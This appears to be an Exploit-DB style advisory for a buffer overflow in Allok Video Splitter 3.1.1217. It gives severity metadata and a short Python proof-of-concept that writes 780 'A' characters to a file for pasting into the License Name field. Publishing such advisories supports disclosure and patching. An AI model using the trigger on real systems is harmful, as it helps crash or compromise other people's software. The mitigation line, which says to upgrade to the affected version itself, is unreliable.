Vendor: Allok Video Splitter
By: Achilles
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Allok Video Splitter
Affected Version From: 3.1.1217
Affected Version To: 3.1.1217
Patch Exists: YES
Related CWE: N/A
CPE: a:alloksoft:allok_video_splitter
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 64-bit DE
2018

Allok Video Splitter 3.1.1217

A buffer overflow vulnerability exists in Allok Video Splitter 3.1.1217. An attacker can trigger it by copying the contents of a specially crafted file into the License Name field and clicking Register, which can lead to arbitrary code execution with the privileges of the user running the application.

Mitigation:

Upgrade to the latest version of Allok Video Splitter 3.1.1217

Exploit-DB raw data:

###########################################################################################
# Exploit Title: Allok Video Splitter 3.1.1217
# Date: 2018-05-09
# Exploit Author: Achilles
# Vendor Homepage: http://www.alloksoft.com/
# Vulnerable Software: http://www.alloksoft.com/allok_vsplitter.exe
# Tested on OS: Windows 7 64-bit DE
# Steps to reproduce: Copy the contents of the file (Evil.txt)
# and paste in the License Name field click Register and BOOM
###########################################################################################

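#!/usr/bin/python

# Test string of 780 "A" characters for the License Name field
buffer = "A" * 780

try:
    # Write the string to Evil.txt so it can be copied into the field
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except IOError:
    print("File cannot be created")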